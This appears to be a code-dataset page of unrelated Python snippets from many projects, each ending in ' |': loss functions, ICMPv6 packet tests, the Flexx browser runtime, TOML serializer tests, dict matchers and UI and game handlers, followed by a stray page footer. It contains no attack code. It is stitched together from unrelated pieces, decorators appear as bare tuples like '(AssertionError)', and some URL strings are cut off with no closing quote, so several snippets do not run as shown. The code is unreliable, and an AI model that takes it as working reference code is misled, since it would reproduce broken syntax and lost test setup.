yc2 = torch.max(y2, y2g)
area_c = ((xc2 - xc1) * (yc2 - yc1))
miouk = (iouk - ((area_c - unionk) / (area_c + eps)))
loss = (1 - miouk)
if (reduction == 'mean'):
loss = (loss.mean() if (loss.numel() > 0) else (0.0 * loss.sum()))
elif (reduction == 'sum'):
loss = loss.sum()
return loss |
class RecordEventListenerTestCase(unittest.TestCase):
def test_send(self):
events = []
record = object()
def e_handler(record, n=1):
events.append(n)
rle = quality_filter.RecordEventListener()
rle.register_handler('e', e_handler)
rle('e', record)
self.assertEqual(events, [1])
rle('e', record, n=5)
self.assertEqual(events, [1, 5])
rle('other', record, n=5)
self.assertEqual(events, [1, 5]) |
def upsert_privacy_experiences_after_config_update(db: Session, experience_config: PrivacyExperienceConfig, regions: List[PrivacyNoticeRegion]) -> Tuple[(List[PrivacyNoticeRegion], List[PrivacyNoticeRegion])]:
linked_regions: List[PrivacyNoticeRegion] = []
current_regions: List[PrivacyNoticeRegion] = experience_config.regions
removed_regions: List[PrivacyNoticeRegion] = [PrivacyNoticeRegion(reg) for reg in {reg.value for reg in current_regions}.difference({reg.value for reg in regions})]
unlinked_regions: List[PrivacyNoticeRegion] = remove_config_from_matched_experiences(db, experience_config, removed_regions)
for region in regions:
existing_experience: Optional[PrivacyExperience] = PrivacyExperience.get_experience_by_region_and_component(db=db, region=region, component=experience_config.component)
data = {'component': experience_config.component, 'region': region, 'experience_config_id': experience_config.id}
if existing_experience:
if (existing_experience.experience_config_id != experience_config.id):
linked_regions.append(region)
existing_experience.update(db, data=data)
else:
PrivacyExperience.create(db, data=data)
linked_regions.append(region)
return (linked_regions, unlinked_regions) |
class VenueMessageFactory(MessageFactory):
async def send_message(self, client: TelegramClient, chat_id: int, target: Message=None) -> Message:
return (await client.send_message(chat_id, file=InputMediaVenue(InputGeoPoint(0.0, 0.0), 'Location name', f'Address {uuid4()}', '', '', ''), reply_to=target))
def compare_message(self, tg_msg: Message, efb_msg: EFBMessage) -> None:
assert (efb_msg.type == MsgType.Location)
assert isinstance(efb_msg.attributes, LocationAttribute)
assert (tg_msg.geo.lat == approx(efb_msg.attributes.latitude, abs=0.001))
assert (tg_msg.geo.long == approx(efb_msg.attributes.longitude, abs=0.001))
assert isinstance(tg_msg.media, MessageMediaVenue)
assert (tg_msg.media.title in efb_msg.text)
assert (tg_msg.media.address in efb_msg.text) |
class Flexx():
def __init__(self):
if window.flexx.init:
raise RuntimeError('Should not create global Flexx object more than once.')
self.is_notebook = False
self.is_exported = False
for key in window.flexx.keys():
self[key] = window.flexx[key]
self.need_main_widget = True
self._session_count = 0
self.sessions = {}
window.addEventListener('load', self.init, False)
window.addEventListener('unload', self.exit, False)
def init(self):
self.asset_node = window.document.createElement('div')
self.asset_node.id = 'Flexx asset container'
window.document.body.appendChild(self.asset_node)
if self.is_exported:
if self.is_notebook:
print('Flexx: I am in an exported notebook!')
else:
print('Flexx: I am in an exported app!')
self.run_exported_app()
else:
print('Flexx: Initializing')
if (not self.is_notebook):
self._remove_querystring()
self.init_logging()
def _remove_querystring(self):
try:
window.history.replaceState(window.history.state, '', window.location.pathname)
except Exception:
pass
def exit(self):
for session in self.sessions.values():
session.exit()
def spin(self, n=1):
RawJS("\n var el = window.document.getElementById('flexx-spinner');\n if (el) {\n if (n === null) { // Hide the spinner overlay, now or in a bit\n if (el.children[0].innerHTML.indexOf('limited') > 0) {\n setTimeout(function() { el.style.display = 'none'; }, 2000);\n } else {\n el.style.display = 'none';\n }\n } else {\n for (var i=0; i<n; i++) { el.children[1].innerHTML += '■'; }\n }\n }\n ")
def init_logging(self):
if window.console.ori_log:
return
window.console.ori_log = window.console.log
window.console.ori_info = (window.console.info or window.console.log)
window.console.ori_warn = (window.console.warn or window.console.log)
window.console.ori_error = (window.console.error or window.console.log)
def log(msg):
window.console.ori_log(msg)
for session in self.sessions.values():
session.send_command('PRINT', str(msg))
def info(msg):
window.console.ori_info(msg)
for session in self.sessions.values():
session.send_command('INFO', str(msg))
def warn(msg):
window.console.ori_warn(msg)
for session in self.sessions.values():
session.send_command('WARN', str(msg))
def error(msg):
evt = dict(message=str(msg), error=msg, preventDefault=(lambda : None))
on_error(evt)
def on_error(evt):
self._handle_error(evt)
on_error = on_error.bind(self)
window.console.log = log
window.console.info = info
window.console.warn = warn
window.console.error = error
window.addEventListener('error', on_error, False)
def create_session(self, app_name, session_id, ws_url):
if (window.performance and (window.performance.navigation.type == 2)):
window.location.reload()
elif self._validate_browser_capabilities():
s = JsSession(app_name, session_id, ws_url)
self._session_count += 1
self[('s' + self._session_count)] = s
self.sessions[session_id] = s
def _validate_browser_capabilities(self):
RawJS("\n var el = window.document.getElementById('flexx-spinner');\n if ( window.WebSocket === undefined || // IE10+\n Object.keys === undefined || // IE9+\n false\n ) {\n var msg = ('Flexx does not support this browser.<br>' +\n 'Try Firefox, Chrome, ' +\n 'or a more recent version of the current browser.');\n if (el) { el.children[0].innerHTML = msg; }\n else { window.alert(msg); }\n return false;\n } else if (''.startsWith === undefined) { // probably IE\n var msg = ('Flexx support for this browser is limited.<br>' +\n 'Consider using Firefox, Chrome, or maybe Edge.');\n if (el) { el.children[0].innerHTML = msg; }\n return true;\n } else {\n return true;\n }\n ")
def _handle_error(self, evt):
msg = short_msg = evt.message
if (not window.evt):
window.evt = evt
if (evt.error and evt.error.stack):
stack = evt.error.stack.splitlines()
session_needle = ('?session_id=' + self.id)
for i in range(len(stack)):
stack[i] = stack[i].replace('', ' ').replace(session_needle, '')
for x in [evt.message, '_pyfunc_op_error']:
if (x in stack[0]):
stack.pop(0)
for i in range(len(stack)):
for x in ['_process_actions', '_process_reactions', '_process_calls']:
if (('Loop.' + x) in stack[i]):
stack = stack[:i]
break
for i in reversed(range(len(stack))):
for x in ['flx_action ']:
if (stack[i] and stack[i].count(x)):
stack.pop(i)
msg += ('\n' + '\n'.join(stack))
elif (evt.message and evt.lineno):
msg += ('\nIn %s:%i' % (evt.filename, evt.lineno))
evt.preventDefault()
window.console.ori_error(msg)
for session in self.sessions.values():
session.send_command('ERROR', short_msg) |
class UserRelated(BaseObject):
def __init__(self, api=None, assigned_tickets=None, ccd_tickets=None, entry_subscriptions=None, forum_subscriptions=None, organization_subscriptions=None, requested_tickets=None, subscriptions=None, topic_comments=None, topics=None, votes=None, **kwargs):
self.api = api
self.assigned_tickets = assigned_tickets
self.ccd_tickets = ccd_tickets
self.entry_subscriptions = entry_subscriptions
self.forum_subscriptions = forum_subscriptions
self.organization_subscriptions = organization_subscriptions
self.requested_tickets = requested_tickets
self.subscriptions = subscriptions
self.topic_comments = topic_comments
self.topics = topics
self.votes = votes
for (key, value) in kwargs.items():
setattr(self, key, value)
for key in self.to_dict():
if (getattr(self, key) is None):
try:
self._dirty_attributes.remove(key)
except KeyError:
continue |
class Test_mldv2_query(unittest.TestCase):
type_ = 130
code = 0
csum = 46500
maxresp = 10000
address = 'ff08::1'
s_flg = 0
qrv = 2
s_qrv = ((s_flg << 3) | qrv)
qqic = 10
num = 0
srcs = []
mld = icmpv6.mldv2_query(maxresp, address, s_flg, qrv, qqic, num, srcs)
buf = (((b"\x82\x00\xb5\xa4'\x10\x00\x00" + b'\xff\x08\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x01') + b'\x02\n\x00\x00')
def setUp(self):
pass
def setUp_with_srcs(self):
self.num = 2
self.srcs = ['ff80::1', 'ff80::2']
self.mld = icmpv6.mldv2_query(self.maxresp, self.address, self.s_flg, self.qrv, self.qqic, self.num, self.srcs)
self.buf = (((((((b"\x82\x00\xb5\xa4'\x10\x00\x00" + b'\xff\x08\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x01') + b'\x02\n\x00\x02') + b'\xff\x80\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x01') + b'\xff\x80\x00\x00\x00\x00\x00\x00') + b'\x00\x00\x00\x00\x00\x00\x00\x02')
def tearDown(self):
pass
def find_protocol(self, pkt, name):
for p in pkt.protocols:
if (p.protocol_name == name):
return p
def test_init(self):
eq_(self.mld.maxresp, self.maxresp)
eq_(self.mld.address, self.address)
eq_(self.mld.s_flg, self.s_flg)
eq_(self.mld.qrv, self.qrv)
eq_(self.mld.qqic, self.qqic)
eq_(self.mld.num, self.num)
eq_(self.mld.srcs, self.srcs)
def test_init_with_srcs(self):
self.setUp_with_srcs()
self.test_init()
def test_parser(self):
(msg, n, _) = icmpv6.icmpv6.parser(self.buf)
eq_(msg.type_, self.type_)
eq_(msg.code, self.code)
eq_(msg.csum, self.csum)
eq_(msg.data.maxresp, self.maxresp)
eq_(msg.data.address, self.address)
eq_(msg.data.s_flg, self.s_flg)
eq_(msg.data.qrv, self.qrv)
eq_(msg.data.qqic, self.qqic)
eq_(msg.data.num, self.num)
eq_(msg.data.srcs, self.srcs)
eq_(n, None)
def test_parser_with_srcs(self):
self.setUp_with_srcs()
self.test_parser()
def test_serialize(self):
src_ipv6 = '3ffe:507:0:1:200:86ff:fe05:80da'
dst_ipv6 = '3ffe:501:0:1001::2'
prev = ipv6(6, 0, 0, len(self.buf), 64, 255, src_ipv6, dst_ipv6)
mld_csum = icmpv6_csum(prev, self.buf)
icmp = icmpv6.icmpv6(self.type_, self.code, 0, self.mld)
buf = icmp.serialize(bytearray(), prev)
(type_, code, csum) = struct.unpack_from(icmp._PACK_STR, six.binary_type(buf))
(maxresp, address, s_qrv, qqic, num) = struct.unpack_from(self.mld._PACK_STR, six.binary_type(buf), icmp._MIN_LEN)
eq_(type_, self.type_)
eq_(code, self.code)
eq_(csum, mld_csum)
eq_(maxresp, self.maxresp)
eq_(address, addrconv.ipv6.text_to_bin(self.address))
s_flg = ((s_qrv >> 3) & 1)
qrv = (s_qrv & 7)
eq_(s_flg, self.s_flg)
eq_(qrv, self.qrv)
eq_(qqic, self.qqic)
eq_(num, self.num)
def test_serialize_with_srcs(self):
self.setUp_with_srcs()
src_ipv6 = '3ffe:507:0:1:200:86ff:fe05:80da'
dst_ipv6 = '3ffe:501:0:1001::2'
prev = ipv6(6, 0, 0, len(self.buf), 64, 255, src_ipv6, dst_ipv6)
mld_csum = icmpv6_csum(prev, self.buf)
icmp = icmpv6.icmpv6(self.type_, self.code, 0, self.mld)
buf = icmp.serialize(bytearray(), prev)
(type_, code, csum) = struct.unpack_from(icmp._PACK_STR, six.binary_type(buf))
(maxresp, address, s_qrv, qqic, num) = struct.unpack_from(self.mld._PACK_STR, six.binary_type(buf), icmp._MIN_LEN)
(addr1, addr2) = struct.unpack_from('!16s16s', six.binary_type(buf), (icmp._MIN_LEN + self.mld._MIN_LEN))
eq_(type_, self.type_)
eq_(code, self.code)
eq_(csum, mld_csum)
eq_(maxresp, self.maxresp)
eq_(address, addrconv.ipv6.text_to_bin(self.address))
s_flg = ((s_qrv >> 3) & 1)
qrv = (s_qrv & 7)
eq_(s_flg, self.s_flg)
eq_(qrv, self.qrv)
eq_(qqic, self.qqic)
eq_(num, self.num)
eq_(addr1, addrconv.ipv6.text_to_bin(self.srcs[0]))
eq_(addr2, addrconv.ipv6.text_to_bin(self.srcs[1]))
def _build_mldv2_query(self):
e = ethernet(ethertype=ether.ETH_TYPE_IPV6)
i = ipv6(nxt=inet.IPPROTO_ICMPV6)
ic = icmpv6.icmpv6(type_=icmpv6.MLD_LISTENER_QUERY, data=self.mld)
p = ((e / i) / ic)
return p
def test_build_mldv2_query(self):
p = self._build_mldv2_query()
e = self.find_protocol(p, 'ethernet')
ok_(e)
eq_(e.ethertype, ether.ETH_TYPE_IPV6)
i = self.find_protocol(p, 'ipv6')
ok_(i)
eq_(i.nxt, inet.IPPROTO_ICMPV6)
ic = self.find_protocol(p, 'icmpv6')
ok_(ic)
eq_(ic.type_, icmpv6.MLD_LISTENER_QUERY)
eq_(ic.data.maxresp, self.maxresp)
eq_(ic.data.address, self.address)
eq_(ic.data.s_flg, self.s_flg)
eq_(ic.data.qrv, self.qrv)
eq_(ic.data.num, self.num)
eq_(ic.data.srcs, self.srcs)
def test_build_mldv2_query_with_srcs(self):
self.setUp_with_srcs()
self.test_build_mldv2_query()
def test_to_string(self):
ic = icmpv6.icmpv6(self.type_, self.code, self.csum, self.mld)
mld_values = {'maxresp': self.maxresp, 'address': self.address, 's_flg': self.s_flg, 'qrv': self.qrv, 'qqic': self.qqic, 'num': self.num, 'srcs': self.srcs}
_mld_str = ','.join([('%s=%s' % (k, repr(mld_values[k]))) for (k, v) in inspect.getmembers(self.mld) if (k in mld_values)])
mld_str = ('%s(%s)' % (icmpv6.mldv2_query.__name__, _mld_str))
icmp_values = {'type_': repr(self.type_), 'code': repr(self.code), 'csum': repr(self.csum), 'data': mld_str}
_ic_str = ','.join([('%s=%s' % (k, icmp_values[k])) for (k, v) in inspect.getmembers(ic) if (k in icmp_values)])
ic_str = ('%s(%s)' % (icmpv6.icmpv6.__name__, _ic_str))
eq_(str(ic), ic_str)
eq_(repr(ic), ic_str)
def test_to_string_with_srcs(self):
self.setUp_with_srcs()
self.test_to_string()
(AssertionError)
def test_num_larger_than_srcs(self):
self.srcs = ['ff80::1', 'ff80::2', 'ff80::3']
self.num = (len(self.srcs) + 1)
self.buf = struct.pack(icmpv6.mldv2_query._PACK_STR, self.maxresp, addrconv.ipv6.text_to_bin(self.address), self.s_qrv, self.qqic, self.num)
for src in self.srcs:
self.buf += struct.pack('16s', addrconv.ipv6.text_to_bin(src))
self.mld = icmpv6.mldv2_query(self.maxresp, self.address, self.s_flg, self.qrv, self.qqic, self.num, self.srcs)
self.test_parser()
(AssertionError)
def test_num_smaller_than_srcs(self):
self.srcs = ['ff80::1', 'ff80::2', 'ff80::3']
self.num = (len(self.srcs) - 1)
self.buf = struct.pack(icmpv6.mldv2_query._PACK_STR, self.maxresp, addrconv.ipv6.text_to_bin(self.address), self.s_qrv, self.qqic, self.num)
for src in self.srcs:
self.buf += struct.pack('16s', addrconv.ipv6.text_to_bin(src))
self.mld = icmpv6.mldv2_query(self.maxresp, self.address, self.s_flg, self.qrv, self.qqic, self.num, self.srcs)
self.test_parser()
def test_default_args(self):
prev = ipv6(nxt=inet.IPPROTO_ICMPV6)
ic = icmpv6.icmpv6(type_=icmpv6.MLD_LISTENER_QUERY, data=icmpv6.mldv2_query())
prev.serialize(ic, None)
buf = ic.serialize(bytearray(), prev)
res = struct.unpack(icmpv6.icmpv6._PACK_STR, six.binary_type(buf[:4]))
eq_(res[0], icmpv6.MLD_LISTENER_QUERY)
eq_(res[1], 0)
eq_(res[2], icmpv6_csum(prev, buf))
res = struct.unpack(icmpv6.mldv2_query._PACK_STR, six.binary_type(buf[4:]))
eq_(res[0], 0)
eq_(res[1], addrconv.ipv6.text_to_bin('::'))
eq_(res[2], 2)
eq_(res[3], 0)
eq_(res[4], 0)
srcs = ['ff80::1', 'ff80::2', 'ff80::3']
que = icmpv6.mldv2_query(srcs=srcs)
buf = que.serialize()
res = struct.unpack_from(icmpv6.mldv2_query._PACK_STR, six.binary_type(buf))
eq_(res[0], 0)
eq_(res[1], addrconv.ipv6.text_to_bin('::'))
eq_(res[2], 2)
eq_(res[3], 0)
eq_(res[4], len(srcs))
(src1, src2, src3) = struct.unpack_from('16s16s16s', six.binary_type(buf), icmpv6.mldv2_query._MIN_LEN)
eq_(src1, addrconv.ipv6.text_to_bin(srcs[0]))
eq_(src2, addrconv.ipv6.text_to_bin(srcs[1]))
eq_(src3, addrconv.ipv6.text_to_bin(srcs[2]))
def test_json(self):
jsondict = self.mld.to_jsondict()
mld = icmpv6.mldv2_query.from_jsondict(jsondict['mldv2_query'])
eq_(str(self.mld), str(mld))
def test_json_with_srcs(self):
self.setUp_with_srcs()
self.test_json() |
def test_01_09_predictions(nlp):
text = "Apple : le nouveau modele X Pro attendu pour l'ete."
doc = nlp(text)
ents = [(ent.text, ent.label_) for ent in doc.ents]
assert (len(ents) == 1)
assert (ents[0] == ('Apple', 'ORG'))
assert (doc[5].ent_type == 0)
assert (doc[6].ent_type == 0) |
class AnimatedPlot(HasTraits):
x_values = Any()
y_values = Array()
color = Str()
plot = Instance(Component)
def _plot_default(self):
if (type(self.x_values) == ArrayDataSource):
self.x_values = self.x_values.get_data()[:]
plot = create_line_plot((self.x_values, self.y_values), color=self.color, bgcolor='white', add_grid=True, add_axis=True)
else:
plot = create_line_plot((self.x_values, self.y_values), color=self.color, bgcolor='white', add_grid=True, add_axis=True)
plot.resizable = ''
plot.bounds = [PLOT_SIZE, PLOT_SIZE]
plot.unified_draw = True
plot.tools.append(PanTool(plot, drag_button='right'))
plot.tools.append(MoveTool(plot))
plot.overlays.append(ZoomTool(plot, tool_mode='box', always_on=False))
self.numpoints = len(self.x_values)
self.current_index = (self.numpoints // 2)
self.increment = 2
return plot
def timer_tick(self):
if (self.current_index <= (self.numpoints / 3)):
self.increment = 2
elif (self.current_index == self.numpoints):
self.increment = (- 2)
self.current_index += self.increment
if (self.current_index > self.numpoints):
self.current_index = self.numpoints
self.plot.index.set_data(self.x_values[:self.current_index])
self.plot.value.set_data(self.y_values[:self.current_index])
self.plot.request_redraw() |
class io_dict_toml_test_case(io_dict_test_case):
def test_from_toml_with_valid_data(self):
j = '\na = 1\n\n[b]\nc = 3\nd = 4\n'
d = IODict.from_toml(j)
self.assertTrue(isinstance(d, dict))
self.assertEqual(d, {'a': 1, 'b': {'c': 3, 'd': 4}})
d = IODict(j, format='toml')
self.assertTrue(isinstance(d, dict))
self.assertEqual(d, {'a': 1, 'b': {'c': 3, 'd': 4}})
(tomllib_available, 'standard tomlib is available, exception will not be raised')
('benedict.serializers.toml.toml_installed', False)
def test_from_toml_with_valid_data_but_toml_extra_not_installed(self):
j = '\na = 1\n\n[b]\nc = 3\nd = 4\n'
with self.assertRaises(ExtrasRequireModuleNotFoundError):
_ = IODict.from_toml(j)
with self.assertRaises(ExtrasRequireModuleNotFoundError):
_ = IODict(j, format='toml')
def test_from_toml_with_invalid_data(self):
j = 'Lorem ipsum est in ea occaecat nisi officia.'
with self.assertRaises(ValueError):
IODict.from_toml(j)
with self.assertRaises(ValueError):
IODict(j, format='toml')
def test_from_toml_with_valid_file_valid_content(self):
filepath = self.input_path('valid-content.toml')
d = IODict.from_toml(filepath)
self.assertTrue(isinstance(d, dict))
d = IODict(filepath, format='toml')
self.assertTrue(isinstance(d, dict))
d = IODict(filepath)
self.assertTrue(isinstance(d, dict))
def test_from_toml_with_valid_file_valid_content_invalid_format(self):
filepath = self.input_path('valid-content.json')
with self.assertRaises(ValueError):
IODict.from_toml(filepath)
filepath = self.input_path('valid-content.qs')
with self.assertRaises(ValueError):
IODict.from_toml(filepath)
filepath = self.input_path('valid-content.xml')
with self.assertRaises(ValueError):
IODict.from_toml(filepath)
filepath = self.input_path('valid-content.yml')
with self.assertRaises(ValueError):
IODict.from_toml(filepath)
def test_from_toml_with_valid_file_invalid_content(self):
filepath = self.input_path('invalid-content.toml')
with self.assertRaises(ValueError):
IODict.from_toml(filepath)
with self.assertRaises(ValueError):
IODict(filepath, format='toml')
def test_from_toml_with_invalid_file(self):
filepath = self.input_path('invalid-file.toml')
with self.assertRaises(ValueError):
IODict.from_toml(filepath)
with self.assertRaises(ValueError):
IODict(filepath, format='toml')
def test_from_toml_with_valid_url_valid_content(self):
url = self.input_url('valid-content.toml')
d = IODict.from_toml(url)
self.assertTrue(isinstance(d, dict))
d = IODict(url, format='toml')
self.assertTrue(isinstance(d, dict))
d = IODict(url)
self.assertTrue(isinstance(d, dict))
def test_from_toml_with_valid_url_invalid_content(self):
url = '
with self.assertRaises(ValueError):
IODict.from_toml(url)
with self.assertRaises(ValueError):
IODict(url, format='toml')
def test_from_toml_with_invalid_url(self):
url = '
with self.assertRaises(ValueError):
IODict.from_toml(url)
with self.assertRaises(ValueError):
IODict(url, format='toml')
def test_to_toml(self):
d = IODict({'x': 7, 'y': 8, 'z': 9, 'a': 1, 'b': 2, 'c': 3})
s = d.to_toml()
self.assertEqual(d, IODict.from_toml(s))
def test_to_toml_file(self):
d = IODict({'x': 7, 'y': 8, 'z': 9, 'a': 1, 'b': 2, 'c': 3})
filepath = self.output_path('test_to_toml_file.toml')
d.to_toml(filepath=filepath)
self.assertFileExists(filepath)
self.assertEqual(d, IODict.from_toml(filepath))
('benedict.serializers.toml.toml_installed', False)
def test_to_toml_with_extra_not_installed(self):
d = IODict({'a': 1, 'b': 2, 'c': 3})
with self.assertRaises(ExtrasRequireModuleNotFoundError):
_ = d.to_toml() |
class TransferProgress(object):
def __init__(self, tp):
self.total_objects = tp.total_objects
self.indexed_objects = tp.indexed_objects
self.received_objects = tp.received_objects
self.local_objects = tp.local_objects
self.total_deltas = tp.total_deltas
self.indexed_deltas = tp.indexed_deltas
self.received_bytes = tp.received_bytes |
class TestDicts(testslide.TestCase):
def testAnyDict(self):
self.assertEqual(testslide.matchers.AnyDict(), {})
self.assertEqual(testslide.matchers.AnyDict(), {'a': 1})
self.assertNotEqual(testslide.matchers.AnyDict(), 69)
self.assertNotEqual(testslide.matchers.AnyDict(), [])
self.assertNotEqual(testslide.matchers.AnyDict(), None)
def testNotEmptyDict(self):
self.assertEqual(testslide.matchers.NotEmptyDict(), {'a': 1})
self.assertNotEqual(testslide.matchers.NotEmptyDict(), {})
self.assertNotEqual(testslide.matchers.NotEmptyDict(), 69)
self.assertNotEqual(testslide.matchers.NotEmptyDict(), [])
self.assertNotEqual(testslide.matchers.NotEmptyDict(), None)
def testEmptyDict(self):
self.assertNotEqual(testslide.matchers.EmptyDict(), {'a': 1})
self.assertEqual(testslide.matchers.EmptyDict(), {})
self.assertNotEqual(testslide.matchers.EmptyDict(), 69)
self.assertNotEqual(testslide.matchers.EmptyDict(), [])
self.assertNotEqual(testslide.matchers.EmptyDict(), None)
def testDictSupersetOf(self):
self.assertEqual(testslide.matchers.DictSupersetOf({'a': 'b', 'c': 1}), {'a': 'b', 'c': 1, 'd': 'e'})
self.assertNotEqual(testslide.matchers.DictSupersetOf({'a': 'b', 'c': 1}), {'c': 1, 'd': 'e'})
self.assertNotEqual(testslide.matchers.DictSupersetOf({}), 'DERP')
with self.assertRaises(ValueError):
testslide.matchers.DictSupersetOf(10)
with self.assertRaises(ValueError):
testslide.matchers.DictSupersetOf('derp')
with self.assertRaises(ValueError):
testslide.matchers.DictSupersetOf(['a', 'b', 'c'])
def testDictContainingKeys(self):
self.assertEqual(testslide.matchers.DictContainingKeys(['a', 'c']), {'a': 'b', 'c': 1, 'd': 'e'})
self.assertNotEqual(testslide.matchers.DictContainingKeys(['a', 'b', 'c']), {'c': 1, 'd': 'e'})
self.assertNotEqual(testslide.matchers.DictContainingKeys([1, 2]), 'DERP')
with self.assertRaises(ValueError):
testslide.matchers.DictContainingKeys(10)
with self.assertRaises(ValueError):
testslide.matchers.DictContainingKeys('derp')
with self.assertRaises(ValueError):
testslide.matchers.DictContainingKeys({'a', 'b', 'c'}) |
class TestIndexListFilterAllocated(TestCase):
def builder(self, key='2'):
self.client = Mock()
self.client.info.return_value = get_es_ver()
self.client.cat.indices.return_value = get_testvals(key, 'state')
self.client.indices.get_settings.return_value = get_testvals(key, 'settings')
self.client.indices.stats.return_value = get_testvals(key, 'stats')
self.client.indices.exists_alias.return_value = False
self.ilo = IndexList(self.client)
def test_missing_key(self):
self.builder()
self.assertRaises(MissingArgument, self.ilo.filter_allocated, value='foo', allocation_type='invalid')
def test_missing_value(self):
self.builder()
self.assertRaises(MissingArgument, self.ilo.filter_allocated, key='tag', allocation_type='invalid')
def test_invalid_allocation_type(self):
self.builder()
self.assertRaises(ValueError, self.ilo.filter_allocated, key='tag', value='foo', allocation_type='invalid')
def test_success(self):
self.builder()
self.ilo.filter_allocated(key='tag', value='foo', allocation_type='include')
self.assertEqual(['index-2016.03.04'], self.ilo.indices)
def test_invalid_tag(self):
self.builder()
self.ilo.filter_allocated(key='invalid', value='foo', allocation_type='include')
self.assertEqual(['index-2016.03.03', 'index-2016.03.04'], sorted(self.ilo.indices)) |
def test_schedule_with_lp():
def double(a: int) -> int:
return (a * 2)
def quadruple(a: int) -> int:
b = double(a=a)
c = double(a=b)
return c
lp = LaunchPlan.create('schedule_test', quadruple, schedule=FixedRate(_datetime.timedelta(hours=12), 'kickoff_input'))
assert (lp.schedule == _schedule_models.Schedule('kickoff_input', rate=_schedule_models.Schedule.FixedRate(12, _schedule_models.Schedule.FixedRateUnit.HOUR))) |
def main(page: Page):
page.add(Row([Container(bgcolor=colors.ORANGE_300, alignment=alignment.center, expand=True), VerticalDivider(), Container(bgcolor=colors.BROWN_400, alignment=alignment.center, expand=True), VerticalDivider(width=1, color='white'), Container(bgcolor=colors.BLUE_300, alignment=alignment.center, expand=True), VerticalDivider(width=9, thickness=3), Container(bgcolor=colors.GREEN_300, alignment=alignment.center, expand=True)], spacing=0, expand=True)) |
class KeyInstanceFlag(IntFlag):
NONE = 0
IS_ACTIVE = (1 << 0)
USER_SET_ACTIVE = (1 << 8)
IS_PAYMENT_REQUEST = (1 << 9)
IS_INVOICE = (1 << 10)
CACHE_MASK = IS_ACTIVE
ACTIVE_MASK = (IS_ACTIVE | USER_SET_ACTIVE)
INACTIVE_MASK = (~ IS_ACTIVE)
ALLOCATED_MASK = (IS_PAYMENT_REQUEST | IS_INVOICE) |
def run():
ovlp_types = 'wf tden nto_org nto'.split()
ovlp_withs = 'adapt first previous'.split()
for (i, (ovlp_type, ovlp_with)) in enumerate(it.product(ovlp_types, ovlp_withs)):
print(highlight_text(f'i={i:02d}, ovlp_type={ovlp_type}, ovlp_with={ovlp_with}'))
geom = geom_from_library('cytosin.xyz', coord_type='redund')
calc = get_calc(ovlp_type, ovlp_with)
geom.set_calculator(calc)
opt = RFOptimizer(geom)
opt.run()
assert calc.root_flips[2]
assert all([(flipped == False) for (i, flipped) in enumerate(calc.root_flips) if (i != 2)])
assert (calc.root == 2)
assert (opt.cur_cycle == 4)
print() |
def create_emp(emp):
doc = frappe.new_doc('Employee')
doc.zenoti_employee_id = emp['id']
doc.zenoti_employee_code = emp['code']
doc.zenoti_employee_username = (emp['personal_info']['user_name'] if ('user_name' in emp['personal_info']) else '')
doc.first_name = emp['personal_info']['first_name']
doc.last_name = emp['personal_info']['last_name']
doc.employee_name = emp['personal_info']['name']
doc.gender = emp_gender_map[emp['personal_info']['gender']]
doc.date_of_joining = today()
doc.date_of_birth = add_to_date(today(), years=(- 25))
doc.insert() |
class FerryFeeHandler(THBEventHandler):
interested = ['action_after']
def handle(self, evt_type, act):
if ((evt_type == 'action_after') and isinstance(act, Damage)):
src = act.source
tgt = act.target
if (not (src and src.has_skill(FerryFee))):
return act
if (not (tgt.cards or tgt.showncards or tgt.equips)):
return act
g = self.game
dist = LaunchCard.calc_distance(g, src, FerryFee(src))
if (not (dist.get(tgt, 10000) <= 0)):
return act
if g.user_input([src], ChooseOptionInputlet(self, (False, True))):
g = self.game
catnames = ('cards', 'showncards', 'equips')
card = g.user_input([src], ChoosePeerCardInputlet(self, tgt, catnames))
card = (card or random_choose_card(g, [tgt.cards, tgt.showncards, tgt.equips]))
if (not card):
return act
g.process_action(FerryFeeEffect(src, tgt, card))
return act |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.